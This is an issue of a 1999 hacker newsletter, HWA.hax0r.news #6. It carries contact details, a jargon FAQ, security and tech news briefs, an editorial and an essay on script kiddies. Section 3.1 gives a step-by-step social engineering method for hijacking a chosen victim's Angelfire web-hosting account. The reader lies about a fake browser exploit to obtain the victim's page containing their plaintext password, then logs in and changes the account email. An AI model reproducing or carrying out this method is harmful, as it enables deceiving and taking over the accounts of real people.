Copy Link
Add to Bookmark
Report
hwa-hn06
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 6 Volume 1 1999 Feb 13/14th 99
==========================================================================
"You know its going to be one of those days when you wake up at 4am and
go into #insomniacs for some company but everyone else is asleep..."
- VeXxation
Synopsis
--------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see.
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
-------------------------------------------------------------------------
Welcome to HWA.hax0r.news ... #6
S P E C I A L I S S U E
tHe |<rAd sT. vA13nt1n3s DaY m4554cr3 1s5u3
"...F.V? (Fantasy Violence) what about R.V? (Real Violence), there are kids
shooting each other on the streets abd congress is worrying about the
coyote dropping an anvil on the roadrunner"
- FProphet'99
-------------------------------------------------------------------------
Issue #6 middle release, Feb 13th 1999 Yes you SHOULD worry.
-------------------------------------------------------------------------
'imapd THIS muthafuckaz'
_____/[ INDEX ]\___________________________________________________________
Key Content
---------------------------------------------------------------------------
0.0 .. COPYRIGHTS
0.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
0.2 .. SOURCES
0.3 .. THIS IS WHO WE ARE
0.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
0.5 .. THE HWA_FAQ V1.0
----------------------------------------------------------------------------
1.0 .. Greets
1.1 .. Last minute stuff, rumours, newsbytes, mailbag
2.0 .. From the editor
3.0 .. The Future of Hacking by pH4RcYd3
3.1 .. Angelfire Flaws by pH4RcYd3
3.2 .. Some underground prose from Liquid Phire
4.0 .. Intercepted log from a private LoU irc conference courtesy of Ruffneck
5.0 .. Microsoft security advisories
5.1 .. Sun security advisories
5.2 .. eYE security advisories
6.0 .. Arbitrary command execution using Pine
7.0 .. Hacking in Germany by Qubik
8.0 .. Spotlight on: Project Gamma by Qubik
9.0 .. Secret Cyber Sex; Gary, your secret is out!
10.0 .. So is Mr Lewis's Kidney!
11.0 .. Free Email acct's full of security holes?
12.0 .. Quebec government's hacker challenge
13.0 .. News from Tokyo from Wile
A.0 .. APPENDICES
A.1 .. PHACVW linx and references
---------------------------------------------------------------------------
The name Linus means "flaxen-haired" and is of Greek origin ...- Ed
"Shouting the loudest does not make you right or true" - FP
---------------------------------------------------------------------------
@HWA'99
0.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
0.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Has it occurred to anybody that "AOL for Dummies" is an extremely
redundant name for a book?
- unknown
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
0.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
HiR:Hackers Information Report... http://axon.jccc.net/hir/
News & I/O zine ................. http://www.antionline.com/
*News/Hacker site................. http://www.bikkel.com/~demoniz/ *DOWN!*
News (New site unconfirmed).......http://cnewz98.hypermart.net/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls (HNN)..................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD ..............................http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
* Yes demoniz is now officially retired, if you go to that site though the
Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will
also be hosting a webboard as soon as that site comes online perhaps you can
visit it and check us out if I can get some decent wwwboard code running I
don't really want to write my own, another alternative being considered is a
telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=cracker
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
Referenced news links
~~~~~~~~~~~~~~~~~~~~~
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://www.l0pht.com/cyberul.html
http://www.hackernews.com/archive.html?122998.html
http://ech0.cjb.net ech0 Security
http://net-security.org Net Security
...
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
BEST-OF-SECURITY Subscription Info.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_/_/_/ _/_/ _/_/_/
_/ _/ _/ _/ _/
_/_/_/ _/ _/ _/_/
_/ _/ _/ _/ _/
_/_/_/ _/_/ _/_/_/
Best Of Security
"echo subscribe|mail best-of-security-request@suburbia.net"
or
"echo subscribe|mail best-of-security-request-d@suburbia.net"
(weekly digest)
For those of you that just don't get the above, try sending a message to
best-of-security-request@suburbia.net with a subject and body of subscribe
and you will get added to the list (maybe, if the admin likes your email).
@HWA
0.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
'A "thug" was once the name for a ritual strangler, and is taken from
the Hindu word Thag... ' - Ed
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
scruciphux@dok.org.......... currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
And an HWA member doing the job of proof reading:
vexxation@usa.net ........: currently active/IRC+ proof reading
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ATTENTION: All foreign correspondants please check in or be removed by next
issue I need your current emails since contact info was recently lost in a
HD mishap and i'm not carrying any deadweight. Plus we need more people sending
in info, my apologies for not getting back to you if you sent in January I lost
it, please resend.
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
Contributors to this issue:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
liquid phire......................: underground prose
pH4RcYd3 .........................: The Future of Hacking+
Qubik ............................: Hacking in Germany+
Ruffneck .........................: LoU irc log+
Spikeman .........................: daily news updates+
Wile .............................: News from Tokyo
:-p
1. We do NOT work for the government in any shape or form.
2. Unchanged since issue #1,
@HWA
0.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
0.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (unchanged) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
*AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
CC - Credit Card phraud
CCC - Chaos Computer Club (Germany)
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch)
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
CT - Cyber Terrorism
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
1.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
Shouts to:
* Kevin Mitnick * demoniz * The l0pht crew
* tattooman * Dicentra * Pyra
* Vexxation * FProphet * TwistedP
* NeMstah * the readers
* all the people who sent in cool emails and support
* our new 'staff' members.
kewl sites:
+ http://www.freshmeat.net/
+ http://www.slashdot.org/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/)
+ http://www.legions.org/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
@HWA
1.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ Check out http://c5.hakker.com/ kewl hostname, kewl host, i was bribed to
say this and its in German so I dunno if its great or not but check em
out anyways, webhosting, email forwarding etc etc ;) (Pages in German)
++ IS YOUR 'FREEMAIL' ACCOUNT FULL OF SECURITY HOLES?
Contributed by me, source: ZDNet news, see section 11 for the full article.
If you have an account on Hotmail, Yahoo!, or Excite, it's vulnerable to
hackers. Ira Winkler investigates the security risks of free e-mail services.
http://chkpt.zdnet.com/chkpt/zdnu99021301/www.zdnet.com/zdtv/cybercrime/spyfiles/story/0,3700,2205746,00.html
++ 15 YR OLD AND 18 YR OLD BUSTED FOR ATTEMPTED COMPUTER BREAKINS
(HNN/contributed by erehwon) Source: Washington Post
Vienna Virginia police have arrested a 15 year old freshman for
breaking into the computers at Clemson University and
attempting to break into systems at NASA. The Vienna student
was arrested Feb. 1 on charges of felony computer trespass and
misdemeanor computer fraud. Authorities in South Carolina have
arrested Steven Ray McAlister, 18, of Pelzer, S.C., and charged
him with conspiracy to commit computer crime, naming the
Vienna youth as his co-conspirator.
http://search.washingtonpost.com/wp-srv/WPlate/1999-02/12/032l-021299-idx.html
++ Dallas Semi Debuts Single-Chip Temperature Data Logger
Contributed to HWA by Spikeman Source: techweb
† ††† DS1615 Temperature Recorder integrates a Y2K-compatible
†† †† real-time clock, digital thermometer, nonvolatile memory, control
†††† logic, and serial interface.
http://www.techweb.com/wire/story/TWB19990211S0008
††††++ Where's Waldo? Maybe On The Edge Of A Chip
Contributed to HWA by Spikeman Source: techweb
††† † Designers have been putting their initials on chips for years, but
†††† finer geometries open the possibility of more sophisticated images,
†††† such as cartoon characters.
http://www.techweb.com/wire/story/TWB19990211S0001
++ AT&T CEO: Scrap Phone-Access Charges
Contributed to HWA by Spikeman Source: techweb
†††† Dumping access charges means an end to universal service, a
†††† decades-long tradition of low-cost phone service to rural areas.
http://www.techweb.com/wire/story/TWB19990210S0016
††++ DOJ: Microsoft Feared Fair Competition
Contributed to HWA by Spikeman Source: techweb
†††† The government's lead attorney says Microsoft feared competing
†††† with Netscape and relied on exclusionary contracts with ISPs.
http://www.techweb.com/wire/story/msftdoj/TWB19990210S0014
++ Gateway Looks To Serve Networked Homes
Contributed to HWA by Spikeman Source: techweb
†††† Gateway is designing a server to serve the networked home of the
†† †† future.
http://www.techweb.com/wire/story/TWB19990210S0017
++ MTV's Road Rules, a hacker haven?
Abe, some dork on Road Rules an MTV show was seen sporting an "official"
r00t hat... you mean just anyone can't make a hat with "r00t" on it? geez
anyway w00t to the r00t ... contributed by everyone and even discussed on
irc and dc-stuff ... (*sigh*) watch for the new HWA.hax0r.news t-shirts and
hats to come soon!!! =) (No offense to r00t intended, they rock harder than
MTV ever could - Ed ps. add me to the bots! ? whats the #Hack key? ;) <sic>
++ Online Freedom Of Information Sparks Fears
Contributed to HWA by Spikeman Source: techweb
†††† Requirement to publish disaster information about nation's chemical
†† †† plants may be road map for terrorists, lawmakers say.
http://www.techweb.com/wire/story/TWB19990210S0015
++ ONLINE PORN† VIGILANTE "A LIAR" (CULT. 9:20 am)
Contributed to HWA by Spikeman Source: ZDNnet news
http://www.wired.com/news/news/email/explode-infobeat/culture/story/17789.html
††††††A former hacker made headlines all over the world when he declared war on
child pornographers. But his one-man campaign wasn't all it was cracked up
to be. By Steve Silberman.
++ FREE PCS -- WITH A CATCH (BUS. 7:28 am)
Contributed to HWA by Spikeman Source: ZDNet news
http://www.wired.com/news/news/email/explode-infobeat/business/story/17783.html
†††††††A California start-up is offering Compaq computers to the
†††††††first 10,000 people to sign away their consumer privacy.
++ BT, MICROSOFT IN WIRELESS DEAL (BUS. 7:28 am)
Contributed to HWA by Spikeman Source: ZDNet news
http://www.wired.com/news/news/email/explode-infobeat/business/story/17784.html
†††††††The two companies reach an agreement to develop Internet and
†††††††corporate data services for mobile users.†††††††
††††++ CHINESE DISSIDENT APPEALS (POL. 7:28 am)
Contributed to HWA by Spikeman Source: ZDNet news
http://www.wired.com/news/news/email/explode-infobeat/politics/story/17785.html
††††††
A software engineer is fighting the two-year sentence that a†Shanghai
court gave him for providing email addresses to†US-based publications.
++ Early Y2K Suit Struck Down
Contributed to HWA by Spikeman Source: The Recorder
" ...in California Intuit Inc. has won another round in the ongoing Y2K
litigation wars. A California judge has dismissed most of the case
against it in a combined class action suit, In re Intuit Inc. Year 2000
California Litigation. Plaintiffs had alleged that Intuit's Quicken
financial software is not Year 2000 compliant and that consumers had
already been damaged as a result. The judge threw out damages and fraud
claims, but said plaintiffs could amend their injunctive relief
complaint, which centers on the charge that Intuit engaged in unfair
business practices." (The Recorder) --
For complete story, see;
http://www.lawnewsnetwork.com/stories/feb/e020899k.html)
++ HACKER STEALS WOMAN'S PASSWORD, SENDS PORNO OFFER IN HER NAME - SF Gate 02/04/99
Contributed to HWA by Spikeman Source: SF Gate
http://www.sfgate.com/cgi-bin/article.cgi?file=/news/archive/1999/02/04/state1338EST0026.DTL
(02-04) 10:38 PST APTOS, Calif. (AP) -- A 70-year-old woman who used
the Internet to learn about quilting and coins was targeted by a
hacker who stole her password and used it to send 22,000 pornographic
e-mails in her name.
"Lucille Nordgren, a grandmother of five, thought America Online was a
convenient way to follow her hobbies. She was still reeling on
Thursday from the news her account was used to send electronic ads
for a web site offering ``incest, fetishes, super young teens, wild
orgies and bondage.''
++ Web Site Won
Contributed to HWA by Spikeman
The anti-abortion Web site the Nuremberg Files was thrown on the
defensive by last week's federal court jury verdict. Then, the site was
shut down Friday afternoon by its Internet service provider, MindSpring.
However, 54-year-old computer programmer Otis O'Neal "Neal" Horsley, is
searching for another ISP. The good news for Horsley is that the judge
in the Portland, Ore., case refused to grant an injunction closing down
the site. "If I go to jail over this, I take the First Amendment with
me," Horsley said. (Fulton County Daily Report -- For complete story,
see http://www.lawnewsnetwork.com/stories/feb/e020899h.html)
++ Intel Trying to Oust FTC Lawyer
Contributed to HWA by Spikeman
Intel is trying to bench the lead government counsel in the Federal
Trade Commission's antitrust case against the chip maker. Richard
Parker, deputy director of the agency's competition bureau and first
chair for the upcoming March 9 trial, is the subject of a motion to
disqualify. Intel filed the motion under seal last month. The company
declined to comment on its grounds for disqualifying Parker, but
Parker's former law firm, O'Melveny & Myers, represented Advanced Micro
Devices in its court battles with Intel in the early '90s, and former
O'Melveny partner Tom McCoy left the firm to become AMD's general
counsel. An FTC spokesperson said that it had cleared Parker's
involvement in the case with two ethics experts. (CNET News -- For
complete story, see
http://www.news.com/News/Item/0,4,32148,00.html?st.ne.ni.lh)
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news you want to read about in a timely manner ... - Ed
@HWA
2.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <insight.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
*Ok kiddies we're pumping out some more stuff here as we steamroll into
*issue #6 i'm wondering if we can really pull off a weekly release as
*hoped. I mean hopefully not too many people are getting caught and not
*too many sites (bah hahahaha yeah right) are being vandalized by the script
*kiddiez etc. Work continues on hwa-iwa.org which is running Debian Linux at
*this time, i'm playing around with some stuff there but don't bother port
*scanning etc u won't find anything interesting on that box unless you really
*want to snarf half written articles <grin> etc ... besides if you did break
*in i'd just end up writing a story about it so whats the point? *g* moving
*right along, thanks for the continued support everyone and tty next time...
*/
printf ("EoF.\n");
}
www.hwa-iwa.org is now online but not ready for primetime yet, if you go
there you will just be presented with a link to the HWA.hax0r.news mirrors
the site is under major development and will be announced here when it goes
"online for primetime" with webboard and file archives etc etc, stay tuned
for more as it becomes available ie: as I get it done ... ;)
Issue #6! ... w00t w00t w00t! ...
w00t! /`wu:t n & v w00ten /`wu:ten n & v Eng. Unk.
1. A transcursion or transcendance into joy from an otherwise inert state
2. Something Cruciphux can't go a day without typing on Efnet
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
3.0 The Future of Hacking by pH4RcYd3
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------------------------
The Future of Hacking
=========================
by pH4RcYd3!pDX
[ pArAd0x ]
pH4RcYd3@hotmail.com
The future of Hacking some people do not think about...But as I was
browsing CyberArmy.com's WWWBoard for some interesting conversations I
was bombarded by messages saying "Anyone have a Win98 Spoofer" and "How
do you find out someone's IP number in AOL" and such things like that.
These tell me one thing about a person...LAMER! These people do not
know any other OS except Winblowz and like to nuke and punt people for
whatever immature reason. They like to send out virii and scerew up
someone's computer for no absolute reason. If I ever met one of these
people in person you know what I would see? I would see a 13 yr. old boy
(or girl) cowering behind his WinNuke walking around a computer store
asking people if they memorized there IP number and if they did, can they
give it to him. Now I realize that i'm generalizing packet warriors at
around teen years, but I won't be quick to speak for all 13 yr olds. Some
of them may have a great understanding of Unix and all its other variations
and might be more l33t than yours truly. But if you've ever gotten into a
fight with someone from AOL, or any other packet warrior they think there
hackers and they try to mailbomb you and nuke you, icmp you, and any other
windows based attack. Not to say that I hate AOL, it's just some packet
warrior newbies, meaning new to DoS attacks and such are usually from AOL,
and they started out using punters. In fact I think AOL is good for people
that don't have that much experience with being online and on the internet,
AOL provides a lovely user interface, and is definitely user friendly. Now
if these people ever got into Linux they would probaly be teardropping and
smurfing everybody but that's not the case because there to illiterate to
new information.
The information they could find on Webpages by spending 2 to 3 hours
everyday reading articles is amazing. But they choose not to. I didn't say
they were to dumb to learn how to use any other OS, or to learn some of the
flaws of a system. They just don't want to, to learn something you have to
want to learn it. But when they finally, maybe, when when they r00t there
first server, they usually did it by an exploit. Script kiddies aren't that
bad, to exploit the bug in the system you must first upload the exploit, to
upload something you need an account? How did they get the account? Well
probaly by getting the passwd file and cracking it if it's not shadowed.
This is better than having them running around IRC shoving packets down
peoples throats. At least there out there learning atleast SOMETHING from
hacking a server.
I would rather have them find some other way to gain entry to a server
but hey, somethings will never change. I'm truly interested too see what
the future of Hacking will have instore for us.
What did u think of this article? Drop me a line at
<a href="mailto:pH4RcYd3@hotmail.com">pH4RcYd3@hotmail.com</a>
@HWA
3.1 Angelfire Security flaws by pH4RcYd3
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
============================
Angelfire Security Flaws
by pH4RcYd3(@hotmail.com)
pDX![ pArAd0x ]
----------------------------
Slightly reformatted/edited for clarity - Ed
Introduction
~~~~~~~~~~~~
Earlier in the year, I found an article on the web that eZoOns wrote
about hacking Angelfire. The method of social engineering and method to
hack Angelfire was insignificant. I offer you what I think is a better
article. Remember this is for educational purposes only and I take no
responsibility for what you might do with this information.
First Things First
~~~~~~~~~~~~~~~~~~
Well first you have to get the page that you get right after you login
to your Angelfire account. This page is called BEDIT.HTML And a couple
ines down from the <html> is their password.
<font color=teal>Your page
<a href="http://www.angelfire.com/ak2/r00t7/index.html">
http://www.angelfire.com/mi/KrazieBread/index.html </a> has been saved.
<br>
You may have to click Reload or Super-Reload (Shift+Reload) to see your
edited page and not your old version when you go to your URL.
<br>You can also announce your new page on
<a href="http://homepages.whowhere.com/bin/showpage.pl?add">WhoWhere?</a>,
<a href="http://newtoo.manifest.com/"><u>What's New Too!</u></a>, or if you
really want to get noticed, go to <a href="http://www.submit-it.com/">
<u>Submit It!</u></a><br>Tune up your Web Site at the
<a href="http://www.angelfire.com/cgi-bin/ct?ad=websitegarage&vp=/index.
clicked&ru=http://www.websitegarage.com/whowhere">Web Site Garage</a>.</font>
</td></tr></table></center>
<form select method="post" action="http://www.angelfire.com/cgi-bin/bedit">
<input type="hidden" name="storage" value="mi">
<input type="hidden" name="hpd" value="r00t">
<input type="hidden" name="password" value="r00t7"> <-------THE PASSWORD!!!
Alright so now you know where the password is, finding the username is a synch
because it's in their URL. Http://www.angelfire.com/whatever/USERNAME/
This is a dumb flaw in the Angelfire user security, yet a very dangerous one if used
right.Kind of lame actually.
Moving in for the Kill
~~~~~~~~~~~~~~~~~~~~~~
Ok first things first
1.) Find some guy that you want to hack and tell him that you found a bug
in IE 4.0 and Netscape Communicator that let's you install keyloggers
and packet sniffers on their system through a perl script.
2.) Tell the guy you need his bedit.html page because you need some of the
info on there, cause if you don't have it the script won't work.
3.) After he sends u the file get the shit you need...Login, and then from
the bedit.html page click change e-mail (don't use your real one) one
from Hotmail or something.
4.) Whatever you want to do with the page is your choice, but remember..
be mature about it and don't do anything you'll regret later..that
line sounded stupid.
Conclusion
~~~~~~~~~~
Well I hope you've enjoyed this article. Thanx to eZoOns for discovering
this vulnerability in the Angelfire system. And greetz to IllumiTIE,
Big Cheese, JellyNuts, Optiklenz, GodsHippy, Legion2000, HcV, HFG, and all
black hat hackzers!#%^
Side note;
~~~~~~~~~~
BTW, although Hotmail is a favourite of 'hackers' make sure you all realize
